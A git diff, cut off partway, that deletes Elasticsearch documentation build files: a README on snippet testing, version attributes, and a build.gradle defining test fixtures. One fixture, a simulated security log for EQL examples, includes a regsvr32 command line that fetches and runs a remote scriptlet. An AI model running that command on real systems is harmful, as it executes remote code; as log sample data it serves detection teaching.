diff --git a/docs/README.asciidoc b/docs/README.asciidoc deleted file mode 100644 index 3b773a066fb..00000000000 --- a/docs/README.asciidoc +++ /dev/null @@ -1,133 +0,0 @@ -The Elasticsearch docs are in AsciiDoc format and can be built using the -Elasticsearch documentation build process. - -See: https://github.com/elastic/docs - -=== Backporting doc fixes - -* Doc changes should generally be made against master and backported through to the current version - (as applicable). - -* Changes can also be backported to the maintenance version of the previous major version. - This is typically reserved for technical corrections, as it can require resolving more complex - merge conflicts, fixing test failures, and figuring out where to apply the change. - -* Avoid backporting to out-of-maintenance versions. - Docs follow the same policy as code and fixes are not ordinarily merged to - versions that are out of maintenance. - -* Do not backport doc changes to https://www.elastic.co/support/eol[EOL versions]. - -=== Snippet testing - -Snippets marked with `[source,console]` are automatically annotated with -"VIEW IN CONSOLE" and "COPY AS CURL" in the documentation and are automatically -tested by the command `./gradlew -pdocs check`. To test just the docs from a -single page, use e.g. `./gradlew -pdocs integTest --tests "\*rollover*"`. - -By default each `[source,console]` snippet runs as its own isolated test. You -can manipulate the test execution in the following ways: - -* `// TEST`: Explicitly marks a snippet as a test. Snippets marked this way -are tests even if they don't have `[source,console]` but usually `// TEST` is -used for its modifiers: - * `// TEST[s/foo/bar/]`: Replace `foo` with `bar` in the generated test. This - should be used sparingly because it makes the snippet "lie". Sometimes, - though, you can use it to make the snippet more clear. Keep in mind that - if there are multiple substitutions then they are applied in the order that - they are defined. - * `// TEST[catch:foo]`: Used to expect errors in the requests. Replace `foo` - with `request` to expect a 400 error, for example. If the snippet contains - multiple requests then only the last request will expect the error. - * `// TEST[continued]`: Continue the test started in the last snippet. Between - tests the nodes are cleaned: indexes are removed, etc. This prevents that - from happening between snippets because the two snippets are a single test. - This is most useful when you have text and snippets that work together to - tell the story of some use case because it merges the snippets (and thus the - use case) into one big test. - * You can't use `// TEST[continued]` immediately after `// TESTSETUP` or - `// TEARDOWN`. - * `// TEST[skip:reason]`: Skip this test. Replace `reason` with the actual - reason to skip the test. Snippets without `// TEST` or `// CONSOLE` aren't - considered tests anyway but this is useful for explicitly documenting the - reason why the test shouldn't be run. - * `// TEST[setup:name]`: Run some setup code before running the snippet. This - is useful for creating and populating indexes used in the snippet. The setup - code is defined in `docs/build.gradle`. See `// TESTSETUP` below for a - similar feature. - * `// TEST[warning:some warning]`: Expect the response to include a `Warning` - header. If the response doesn't include a `Warning` header with the exact - text then the test fails. If the response includes `Warning` headers that - aren't expected then the test fails. -* `[source,console-result]`: Matches this snippet against the body of the - response of the last test. If the response is JSON then order is ignored. If - you add `// TEST[continued]` to the snippet after `[source,console-result]` - it will continue in the same test, allowing you to interleave requests with - responses to check. -* `// TESTRESPONSE`: Explicitly marks a snippet as a test response even without - `[source,console-result]`. Similarly to `// TEST` this is mostly used for - its modifiers. - * You can't use `[source,console-result]` immediately after `// TESTSETUP`. - Instead, consider using `// TEST[continued]` or rearrange your snippets. - - NOTE: Previously we only used `// TESTRESPONSE` instead of - `[source,console-result]` so you'll see that a lot in older branches but we - prefer `[source,console-result]` now. - - * `// TESTRESPONSE[s/foo/bar/]`: Substitutions. See `// TEST[s/foo/bar]` for - how it works. These are much more common than `// TEST[s/foo/bar]` because - they are useful for eliding portions of the response that are not pertinent - to the documentation. - * One interesting difference here is that you often want to match against - the response from Elasticsearch. To do that you can reference the "body" of - the response like this: `// TESTRESPONSE[s/"took": 25/"took": $body.took/]`. - Note the `$body` string. This says "I don't expect that 25 number in the - response, just match against what is in the response." Instead of writing - the path into the response after `$body` you can write `$_path` which - "figures out" the path. This is especially useful for making sweeping - assertions like "I made up all the numbers in this example, don't compare - them" which looks like `// TESTRESPONSE[s/\d+/$body.$_path/]`. - * `// TESTRESPONSE[non_json]`: Add substitutions for testing responses in a - format other than JSON. Use this after all other substitutions so it doesn't - make other substitutions difficult. - * `// TESTRESPONSE[skip:reason]`: Skip the assertions specified by this - response. -* `// TESTSETUP`: Marks this snippet as the "setup" for all other snippets in - this file. This is a somewhat natural way of structuring documentation. You - say "this is the data we use to explain this feature" then you add the - snippet that you mark `// TESTSETUP` and then every snippet will turn into - a test that runs the setup snippet first. See the "painless" docs for a file - that puts this to good use. This is fairly similar to `// TEST[setup:name]` - but rather than the setup defined in `docs/build.gradle` the setup is defined - right in the documentation file. In general, we should prefer `// TESTSETUP` - over `// TEST[setup:name]` because it makes it more clear what steps have to - be taken before the examples will work. Tip: `// TESTSETUP` can only be used - on the first snippet of a document. -* `// TEARDOWN`: Ends and cleans up a test series started with `// TESTSETUP` or - `// TEST[setup:name]`. You can use `// TEARDOWN` to set up multiple tests in - the same file. -* `// NOTCONSOLE`: Marks this snippet as neither `// CONSOLE` nor - `// TESTRESPONSE`, excluding it from the list of unconverted snippets. We - should only use this for snippets that *are* JSON but are *not* responses or - requests. - -In addition to the standard CONSOLE syntax these snippets can contain blocks -of yaml surrounded by markers like this: - -``` -startyaml - - compare_analyzers: {index: thai_example, first: thai, second: rebuilt_thai} -endyaml -``` - -This allows slightly more expressive testing of the snippets. Since that syntax -is not supported by `[source,console]` the usual way to incorporate it is with a -`// TEST[s//]` marker like this: - -``` -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: thai_example, first: thai, second: rebuilt_thai}\nendyaml\n/] -``` - -Any place you can use json you can use elements like `$body.path.to.thing` -which is replaced on the fly with the contents of the thing at `path.to.thing` -in the last response. diff --git a/docs/Versions.asciidoc b/docs/Versions.asciidoc deleted file mode 100644 index b1699b99bdd..00000000000 --- a/docs/Versions.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ - -include::{docs-root}/shared/versions/stack/{source_branch}.asciidoc[] - -:lucene_version: 8.7.0 -:lucene_version_path: 8_7_0 -:jdk: 1.8.0_131 -:jdk_major: 8 -:build_flavor: default -:build_type: tar - -:docker-repo: docker.elastic.co/elasticsearch/elasticsearch -:docker-image: {docker-repo}:{version} -:plugin_url: https://artifacts.elastic.co/downloads/elasticsearch-plugins - -/////// -Javadoc roots used to generate links from Painless's API reference -/////// -:java11-javadoc: https://docs.oracle.com/en/java/javase/11/docs/api -:lucene-core-javadoc: https://lucene.apache.org/core/{lucene_version_path}/core - -ifeval::["{release-state}"=="unreleased"] -:elasticsearch-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/elasticsearch/{version}-SNAPSHOT -:transport-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/client/transport/{version}-SNAPSHOT -:rest-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-client/{version}-SNAPSHOT -:rest-client-sniffer-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-client-sniffer/{version}-SNAPSHOT -:rest-high-level-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-high-level-client/{version}-SNAPSHOT -:mapper-extras-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/mapper-extras-client/{version}-SNAPSHOT -:painless-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/painless/lang-painless/{version}-SNAPSHOT -:parent-join-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/parent-join-client/{version}-SNAPSHOT -:percolator-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/percolator-client/{version}-SNAPSHOT -:matrixstats-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/aggs-matrix-stats-client/{version}-SNAPSHOT -:rank-eval-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/rank-eval-client/{version}-SNAPSHOT -:version_qualified: {bare_version}-SNAPSHOT -endif::[] - -ifeval::["{release-state}"!="unreleased"] -:elasticsearch-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/elasticsearch/{version} -:transport-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/client/transport/{version} -:rest-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-client/{version} -:rest-client-sniffer-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-client-sniffer/{version} -:rest-high-level-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/client/elasticsearch-rest-high-level-client/{version} -:mapper-extras-client-javadoc: https://snapshots.elastic.co/javadoc/org/elasticsearch/plugin/mapper-extras-client/{version} -:painless-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/painless/lang-painless/{version} -:parent-join-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/plugin/parent-join-client/{version} -:percolator-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/plugin/percolator-client/{version} -:matrixstats-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/plugin/aggs-matrix-stats-client/{version} -:rank-eval-client-javadoc: https://artifacts.elastic.co/javadoc/org/elasticsearch/plugin/rank-eval-client/{version} -:version_qualified: {bare_version} -endif::[] - -:javadoc-client: {rest-high-level-client-javadoc}/org/elasticsearch/client -:javadoc-xpack: {rest-high-level-client-javadoc}/org/elasticsearch/protocol/xpack -:javadoc-license: {rest-high-level-client-javadoc}/org/elasticsearch/protocol/xpack/license -:javadoc-watcher: {rest-high-level-client-javadoc}/org/elasticsearch/protocol/xpack/watcher - -/////// -Permanently unreleased branches (master, n.X) -/////// -ifeval::["{source_branch}"=="master"] -:permanently-unreleased-branch: -endif::[] -ifeval::["{source_branch}"=="{major-version}"] -:permanently-unreleased-branch: -endif::[] - -/////// -Shared attribute values are pulled from elastic/docs -/////// - -include::{docs-root}/shared/attributes.asciidoc[] - -/////// -APM does not build n.x documentation. Links from .x branches should point to master instead -/////// -ifeval::["{source_branch}"=="7.x"] -:apm-server-ref: {apm-server-ref-m} -:apm-server-ref-v: {apm-server-ref-m} -:apm-overview-ref-v: {apm-overview-ref-m} -endif::[] diff --git a/docs/build.gradle b/docs/build.gradle deleted file mode 100644 index 68078d5f5c5..00000000000 --- a/docs/build.gradle +++ /dev/null @@ -1,1467 +0,0 @@ -import org.elasticsearch.gradle.info.BuildParams - -import static org.elasticsearch.gradle.testclusters.TestDistribution.DEFAULT - -/* - * Licensed to Elasticsearch under one or more contributor - * license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright - * ownership. Elasticsearch licenses this file to you under - * the Apache License, Version 2.0 (the "License"); you may - * not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, - * software distributed under the License is distributed on an - * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY - * KIND, either express or implied. See the License for the - * specific language governing permissions and limitations - * under the License. - */ - -apply plugin: 'elasticsearch.docs-test' -apply plugin: 'elasticsearch.rest-resources' - -/* List of files that have snippets that will not work until platinum tests can occur ... */ -buildRestTests.expectedUnconvertedCandidates = [ - 'reference/ml/anomaly-detection/ml-configuring-transform.asciidoc', - 'reference/ml/anomaly-detection/apis/delete-calendar-event.asciidoc', - 'reference/ml/anomaly-detection/apis/get-bucket.asciidoc', - 'reference/ml/anomaly-detection/apis/get-category.asciidoc', - 'reference/ml/anomaly-detection/apis/get-influencer.asciidoc', - 'reference/ml/anomaly-detection/apis/get-job-stats.asciidoc', - 'reference/ml/anomaly-detection/apis/get-job.asciidoc', - 'reference/ml/anomaly-detection/apis/get-overall-buckets.asciidoc', - 'reference/ml/anomaly-detection/apis/get-record.asciidoc', - 'reference/ml/anomaly-detection/apis/get-snapshot.asciidoc', - 'reference/ml/anomaly-detection/apis/post-data.asciidoc', - 'reference/ml/anomaly-detection/apis/revert-snapshot.asciidoc', - 'reference/ml/anomaly-detection/apis/update-snapshot.asciidoc', - 'reference/ml/anomaly-detection/apis/update-job.asciidoc' -] - -restResources { - restApi { - includeCore '*' - } -} - -testClusters.integTest { - if (singleNode().testDistribution == DEFAULT) { - setting 'xpack.license.self_generated.type', 'trial' - setting 'indices.lifecycle.history_index_enabled', 'false' - if (BuildParams.isSnapshotBuild() == false) { - systemProperty 'es.autoscaling_feature_flag_registered', 'true' - } - setting 'xpack.autoscaling.enabled', 'true' - keystorePassword 's3cr3t' - } - - // enable regexes in painless so our tests don't complain about example snippets that use them - setting 'script.painless.regex.enabled', 'true' - setting 'path.repo', "${buildDir}/cluster/shared/repo" - Closure configFile = { - extraConfigFile it, file("src/test/cluster/config/$it") - } - configFile 'analysis/example_word_list.txt' - configFile 'analysis/hyphenation_patterns.xml' - configFile 'analysis/synonym.txt' - configFile 'analysis/stemmer_override.txt' - configFile 'userdict_ja.txt' - configFile 'userdict_ko.txt' - configFile 'KeywordTokenizer.rbbi' - extraConfigFile 'hunspell/en_US/en_US.aff', project(":server").file('src/test/resources/indices/analyze/conf_dir/hunspell/en_US/en_US.aff') - extraConfigFile 'hunspell/en_US/en_US.dic', project(":server").file('src/test/resources/indices/analyze/conf_dir/hunspell/en_US/en_US.dic') - // Whitelist reindexing from the local node so we can test it. - setting 'reindex.remote.whitelist', '127.0.0.1:*' - - // TODO: remove this once cname is prepended to transport.publish_address by default in 8.0 - systemProperty 'es.transport.cname_in_publish_address', 'true' -} - -// build the cluster with all plugins -project.rootProject.subprojects.findAll { it.parent.path == ':plugins' }.each { subproj -> - /* Skip repositories. We just aren't going to be able to test them so it - * doesn't make sense to waste time installing them. */ - if (subproj.path.startsWith(':plugins:repository-')) { - return - } - // Do not install ingest-attachment in a FIPS 140 JVM as this is not supported - if (subproj.path.startsWith(':plugins:ingest-attachment') && BuildParams.inFipsJvm) { - return - } - testClusters.integTest.plugin subproj.path -} - -buildRestTests.docs = fileTree(projectDir) { - // No snippets in here! - exclude 'build.gradle' - // That is where the snippets go, not where they come from! - exclude 'build' - // Just syntax examples - exclude 'README.asciidoc' - // Broken code snippet tests - exclude 'reference/graph/explore.asciidoc' - if (Boolean.parseBoolean(System.getProperty("tests.fips.enabled"))) { - // We don't install/support this plugin in FIPS 140 - exclude 'plugins/ingest-attachment.asciidoc' - // We can't conditionally control output, this would be missing the ingest-attachment plugin - exclude 'reference/cat/plugins.asciidoc' - } -} - -listSnippets.docs = buildRestTests.docs - -Closure setupMyIndex = { String name, int count -> - buildRestTests.setups[name] = ''' - - do: - indices.create: - index: my-index-000001 - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - "@timestamp": - type: date - http: - properties: - request: - properties: - method: - type: keyword - message: - type: text - user: - properties: - id: - type: keyword - doc_values: true - - do: - bulk: - index: my-index-000001 - refresh: true - body: |''' - for (int i = 0; i < count; i++) { - String ip, user_id - if (i == 0) { - ip = '127.0.0.1' - user_id = 'kimchy' - } else { - ip = '10.42.42.42' - user_id= 'elkbee' - } - buildRestTests.setups[name] += """ - { "index":{"_id": "$i"} } - { "@timestamp": "2099-11-15T14:12:12", "http": { "request": { "method": "get" }, "response": { "bytes": 1070000, "status_code": 200 }, "version": "1.1" }, "message": "GET /search HTTP/1.1 200 1070000", "source": { "ip": "$ip" }, "user": { "id": "$user_id" } }""" - } -} -setupMyIndex('my_index', 5) -setupMyIndex('my_index_big', 120) -setupMyIndex('my_index_huge', 1200) - -// Used for several full-text search and agg examples -buildRestTests.setups['messages'] = ''' - - do: - indices.create: - index: my-index-000001 - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - - do: - bulk: - index: my-index-000001 - refresh: true - body: | - {"index":{"_id": "0"}} - {"message": "trying out Elasticsearch"} - {"index":{"_id": "1"}} - {"message": "some message with the number 1"} - {"index":{"_id": "2"}} - {"message": "some message with the number 2"} - {"index":{"_id": "3"}} - {"message": "some message with the number 3"} - {"index":{"_id": "4"}} - {"message": "some message with the number 4"}''' - -// Used for EQL -buildRestTests.setups['sec_logs'] = ''' - - do: - indices.create: - index: my-index-000001 - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - - do: - bulk: - index: my-index-000001 - refresh: true - body: | - {"index":{}} - {"@timestamp": "2099-12-06T11:04:05.000Z", "event": { "category": "process", "id": "edwCRnyD", "sequence": 1 }, "process": { "pid": 2012, "name": "cmd.exe", "executable": "C:\\\\Windows\\\\System32\\\\cmd.exe" }} - {"index":{}} - {"@timestamp": "2099-12-06T11:04:07.000Z", "event": { "category": "file", "id": "dGCHwoeS", "sequence": 2 }, "file": { "accessed": "2099-12-07T11:07:08.000Z", "name": "cmd.exe", "path": "C:\\\\Windows\\\\System32\\\\cmd.exe", "type": "file", "size": 16384 }, "process": { "pid": 2012, "name": "cmd.exe", "executable": "C:\\\\Windows\\\\System32\\\\cmd.exe" }} - {"index":{}} - {"@timestamp": "2099-12-07T11:06:07.000Z", "event": { "category": "process", "id": "cMyt5SZ2", "sequence": 3 }, "process": { "pid": 2012, "name": "cmd.exe", "executable": "C:\\\\Windows\\\\System32\\\\cmd.exe" } } - {"index":{}} - {"@timestamp": "2099-12-07T11:07:09.000Z", "event": { "category": "process", "id": "aR3NWVOs", "sequence": 4 }, "process": { "pid": 2012, "name": "regsvr32.exe", "command_line": "regsvr32.exe /s /u /i:https://...RegSvr32.sct scrobj.dll", "executable": "C:\\\\Windows\\\\System32\\\\regsvr32.exe" }} - {"index":{}} - {"@timestamp": "2099-12-07T11:07:10.000Z", "event": { "category": "file", "id": "tZ1NWVOs", "sequence": 5 }, "process": { "pid": 2012, "name": "regsvr32.exe", "executable": "C:\\\\Windows\\\\System32\\\\regsvr32.exe" }, "file": { "path": "C:\\\\Windows\\\\System32\\\\scrobj.dll", "name": "scrobj.dll" }} - {"index":{}} - {"@timestamp": "2099-12-07T11:07:10.000Z", "event": { "category": "process", "id": "GTSmSqgz0U", "sequence": 6, "type": "termination" }, "process": { "pid": 2012, "name": "regsvr32.exe", "executable": "C:\\\\Windows\\\\System32\\\\regsvr32.exe" }}''' - -buildRestTests.setups['host'] = ''' - # Fetch the http host. We use the host of the master because we know there will always be a master. - - do: - cluster.state: {} - - set: { master_node: master } - - do: - nodes.info: - metric: [ http, transport ] - - set: {nodes.$master.http.publish_address: host} - - set: {nodes.$master.transport.publish_address: transport_host} -''' - -buildRestTests.setups['node'] = ''' - # Fetch the node name. We use the host of the master because we know there will always be a master. - - do: - cluster.state: {} - - is_true: master_node - - set: { master_node: node_name } -''' - -// Used by scripted metric docs -buildRestTests.setups['ledger'] = ''' - - do: - indices.create: - index: ledger - body: - settings: - number_of_shards: 2 - number_of_replicas: 1 - mappings: - properties: - type: - type: keyword - amount: - type: double - - do: - bulk: - index: ledger - refresh: true - body: | - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 200, "type": "sale", "description": "something"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 10, "type": "expense", "description": "another thing"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 150, "type": "sale", "description": "blah"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 50, "type": "expense", "description": "cost of blah"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "amount": 50, "type": "expense", "description": "advertisement"}''' - -// Used by aggregation docs -buildRestTests.setups['sales'] = ''' - - do: - indices.create: - index: sales - body: - settings: - number_of_shards: 2 - number_of_replicas: 1 - mappings: - properties: - type: - type: keyword - - do: - bulk: - index: sales - refresh: true - body: | - {"index":{}} - {"date": "2015/01/01 00:00:00", "price": 200, "promoted": true, "rating": 1, "type": "hat"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "price": 200, "promoted": true, "rating": 1, "type": "t-shirt"} - {"index":{}} - {"date": "2015/01/01 00:00:00", "price": 150, "promoted": true, "rating": 5, "type": "bag"} - {"index":{}} - {"date": "2015/02/01 00:00:00", "price": 50, "promoted": false, "rating": 1, "type": "hat"} - {"index":{}} - {"date": "2015/02/01 00:00:00", "price": 10, "promoted": true, "rating": 4, "type": "t-shirt"} - {"index":{}} - {"date": "2015/03/01 00:00:00", "price": 200, "promoted": true, "rating": 1, "type": "hat"} - {"index":{}} - {"date": "2015/03/01 00:00:00", "price": 175, "promoted": false, "rating": 2, "type": "t-shirt"}''' - -// Used by cumulative cardinality aggregation docs -buildRestTests.setups['user_hits'] = ''' - - do: - indices.create: - index: user_hits - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - mappings: - properties: - user_id: - type: keyword - timestamp: - type: date - - do: - bulk: - index: user_hits - refresh: true - body: | - {"index":{}} - {"timestamp": "2019-01-01T13:00:00", "user_id": "1"} - {"index":{}} - {"timestamp": "2019-01-01T13:00:00", "user_id": "2"} - {"index":{}} - {"timestamp": "2019-01-02T13:00:00", "user_id": "1"} - {"index":{}} - {"timestamp": "2019-01-02T13:00:00", "user_id": "3"} - {"index":{}} - {"timestamp": "2019-01-03T13:00:00", "user_id": "1"} - {"index":{}} - {"timestamp": "2019-01-03T13:00:00", "user_id": "2"} - {"index":{}} - {"timestamp": "2019-01-03T13:00:00", "user_id": "4"}''' - - -// Fake bank account data used by getting-started.asciidoc -buildRestTests.setups['bank'] = ''' - - do: - indices.create: - index: bank - body: - settings: - number_of_shards: 5 - number_of_routing_shards: 5 - - do: - bulk: - index: bank - refresh: true - body: | -#bank_data# -''' -/* Load the actual accounts only if we're going to use them. This complicates - * dependency checking but that is a small price to pay for not building a - * 400kb string every time we start the build. */ -File accountsFile = new File("$projectDir/src/test/resources/accounts.json") -buildRestTests.inputs.file(accountsFile) -buildRestTests.doFirst { - String accounts = accountsFile.getText('UTF-8') - // Indent like a yaml test needs - accounts = accounts.replaceAll('(?m)^', ' ') - buildRestTests.setups['bank'] = - buildRestTests.setups['bank'].replace('#bank_data#', accounts) -} - -// Used by sampler and diversified-sampler aggregation docs -buildRestTests.setups['stackoverflow'] = ''' - - do: - indices.create: - index: stackoverflow - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - author: - type: keyword - tags: - type: keyword - - do: - bulk: - index: stackoverflow - refresh: true - body: |''' - -// Make Kibana strongly connected to elasticsearch and logstash -// Make Kibana rarer (and therefore higher-ranking) than JavaScript -// Make JavaScript strongly connected to jquery and angular -// Make Cabana strongly connected to elasticsearch but only as a result of a single author - -for (int i = 0; i < 150; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "very_relevant_$i", "tags": ["elasticsearch", "kibana"]}""" -} -for (int i = 0; i < 50; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "very_relevant_$i", "tags": ["logstash", "kibana"]}""" -} -for (int i = 0; i < 200; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "partially_relevant_$i", "tags": ["javascript", "jquery"]}""" -} -for (int i = 0; i < 200; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "partially_relevant_$i", "tags": ["javascript", "angular"]}""" -} -for (int i = 0; i < 50; i++) { - buildRestTests.setups['stackoverflow'] += """ - {"index":{}} - {"author": "noisy author", "tags": ["elasticsearch", "cabana"]}""" -} -buildRestTests.setups['stackoverflow'] += """ -""" -// Used by significant_text aggregation docs -buildRestTests.setups['news'] = ''' - - do: - indices.create: - index: news - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - source: - type: keyword - content: - type: text - - do: - bulk: - index: news - refresh: true - body: |''' - -// Make h5n1 strongly connected to bird flu - -for (int i = 0; i < 100; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "very_relevant_$i", "content": "bird flu h5n1"}""" -} -for (int i = 0; i < 100; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "filler_$i", "content": "bird dupFiller "}""" -} -for (int i = 0; i < 100; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "filler_$i", "content": "flu dupFiller "}""" -} -for (int i = 0; i < 20; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "partially_relevant_$i", "content": "elasticsearch dupFiller dupFiller dupFiller dupFiller pozmantier"}""" -} -for (int i = 0; i < 10; i++) { - buildRestTests.setups['news'] += """ - {"index":{}} - {"source": "partially_relevant_$i", "content": "elasticsearch logstash kibana"}""" -} -buildRestTests.setups['news'] += """ -""" - -// Used by some aggregations -buildRestTests.setups['exams'] = ''' - - do: - indices.create: - index: exams - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - grade: - type: byte - - do: - bulk: - index: exams - refresh: true - body: | - {"index":{}} - {"grade": 100, "weight": 2} - {"index":{}} - {"grade": 50, "weight": 3}''' - -buildRestTests.setups['stored_example_script'] = ''' - # Simple script to load a field. Not really a good example, but a simple one. - - do: - put_script: - id: "my_script" - body: { "script": { "lang": "painless", "source": "doc[params.field].value" } } - - match: { acknowledged: true } -''' - -buildRestTests.setups['stored_scripted_metric_script'] = ''' - - do: - put_script: - id: "my_init_script" - body: { "script": { "lang": "painless", "source": "state.transactions = []" } } - - match: { acknowledged: true } - - - do: - put_script: - id: "my_map_script" - body: { "script": { "lang": "painless", "source": "state.transactions.add(doc.type.value == 'sale' ? doc.amount.value : -1 * doc.amount.value)" } } - - match: { acknowledged: true } - - - do: - put_script: - id: "my_combine_script" - body: { "script": { "lang": "painless", "source": "double profit = 0;for (t in state.transactions) { profit += t; } return profit" } } - - match: { acknowledged: true } - - - do: - put_script: - id: "my_reduce_script" - body: { "script": { "lang": "painless", "source": "double profit = 0;for (a in states) { profit += a; } return profit" } } - - match: { acknowledged: true } -''' - -// Used by analyze api -buildRestTests.setups['analyze_sample'] = ''' - - do: - indices.create: - index: analyze_sample - body: - settings: - number_of_shards: 1 - number_of_replicas: 0 - analysis: - normalizer: - my_normalizer: - type: custom - filter: [lowercase] - mappings: - properties: - obj1.field1: - type: text''' - -// Used by percentile/percentile-rank aggregations -buildRestTests.setups['latency'] = ''' - - do: - indices.create: - index: latency - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - load_time: - type: long - - do: - bulk: - index: latency - refresh: true - body: |''' - - -for (int i = 0; i < 100; i++) { - def value = i - if (i % 10) { - value = i * 10 - } - buildRestTests.setups['latency'] += """ - {"index":{}} - {"load_time": "$value"}""" -} - -// Used by t_test aggregations -buildRestTests.setups['node_upgrade'] = ''' - - do: - indices.create: - index: node_upgrade - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - group: - type: keyword - startup_time_before: - type: long - startup_time_after: - type: long - - do: - bulk: - index: node_upgrade - refresh: true - body: | - {"index":{}} - {"group": "A", "startup_time_before": 102, "startup_time_after": 89} - {"index":{}} - {"group": "A", "startup_time_before": 99, "startup_time_after": 93} - {"index":{}} - {"group": "A", "startup_time_before": 111, "startup_time_after": 72} - {"index":{}} - {"group": "B", "startup_time_before": 97, "startup_time_after": 98} - {"index":{}} - {"group": "B", "startup_time_before": 101, "startup_time_after": 102} - {"index":{}} - {"group": "B", "startup_time_before": 99, "startup_time_after": 98}''' - -// Used by iprange agg -buildRestTests.setups['iprange'] = ''' - - do: - indices.create: - index: ip_addresses - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - properties: - ip: - type: ip - - do: - bulk: - index: ip_addresses - refresh: true - body: |''' - - -for (int i = 0; i < 255; i++) { - buildRestTests.setups['iprange'] += """ - {"index":{}} - {"ip": "10.0.0.$i"}""" -} -for (int i = 0; i < 5; i++) { - buildRestTests.setups['iprange'] += """ - {"index":{}} - {"ip": "9.0.0.$i"}""" - buildRestTests.setups['iprange'] += """ - {"index":{}} - {"ip": "11.0.0.$i"}""" - buildRestTests.setups['iprange'] += """ - {"index":{}} - {"ip": "12.0.0.$i"}""" -} -// Used by SQL because it looks SQL-ish -buildRestTests.setups['library'] = ''' - - do: - indices.create: - include_type_name: true - index: library - body: - settings: - number_of_shards: 1 - number_of_replicas: 1 - mappings: - book: - properties: - name: - type: text - fields: - keyword: - type: keyword - author: - type: text - fields: - keyword: - type: keyword - release_date: - type: date - page_count: - type: short - - do: - bulk: - index: library - type: book - refresh: true - body: | - {"index":{"_id": "Leviathan Wakes"}} - {"name": "Leviathan Wakes", "author": "James S.A. Corey", "release_date": "2011-06-02", "page_count": 561} - {"index":{"_id": "Hyperion"}} - {"name": "Hyperion", "author": "Dan Simmons", "release_date": "1989-05-26", "page_count": 482} - {"index":{"_id": "Dune"}} - {"name": "Dune", "author": "Frank Herbert", "release_date": "1965-06-01", "page_count": 604} - {"index":{"_id": "Dune Messiah"}} - {"name": "Dune Messiah", "author": "Frank Herbert", "release_date": "1969-10-15", "page_count": 331} - {"index":{"_id": "Children of Dune"}} - {"name": "Children of Dune", "author": "Frank Herbert", "release_date": "1976-04-21", "page_count": 408} - {"index":{"_id": "God Emperor of Dune"}} - {"name": "God Emperor of Dune", "author": "Frank Herbert", "release_date": "1981-05-28", "page_count": 454} - {"index":{"_id": "Consider Phlebas"}} - {"name": "Consider Phlebas", "author": "Iain M. Banks", "release_date": "1987-04-23", "page_count": 471} - {"index":{"_id": "Pandora's Star"}} - {"name": "Pandora's Star", "author": "Peter F. Hamilton", "release_date": "2004-03-02", "page_count": 768} - {"index":{"_id": "Revelation Space"}} - {"name": "Revelation Space", "author": "Alastair Reynolds", "release_date": "2000-03-15", "page_count": 585} - {"index":{"_id": "A Fire Upon the Deep"}} - {"name": "A Fire Upon the Deep", "author": "Vernor Vinge", "release_date": "1992-06-01", "page_count": 613} - {"index":{"_id": "Ender's Game"}} - {"name": "Ender's Game", "author": "Orson Scott Card", "release_date": "1985-06-01", "page_count": 324} - {"index":{"_id": "1984"}} - {"name": "1984", "author": "George Orwell", "release_date": "1985-06-01", "page_count": 328} - {"index":{"_id": "Fahrenheit 451"}} - {"name": "Fahrenheit 451", "author": "Ray Bradbury", "release_date": "1953-10-15", "page_count": 227} - {"index":{"_id": "Brave New World"}} - {"name": "Brave New World", "author": "Aldous Huxley", "release_date": "1932-06-01", 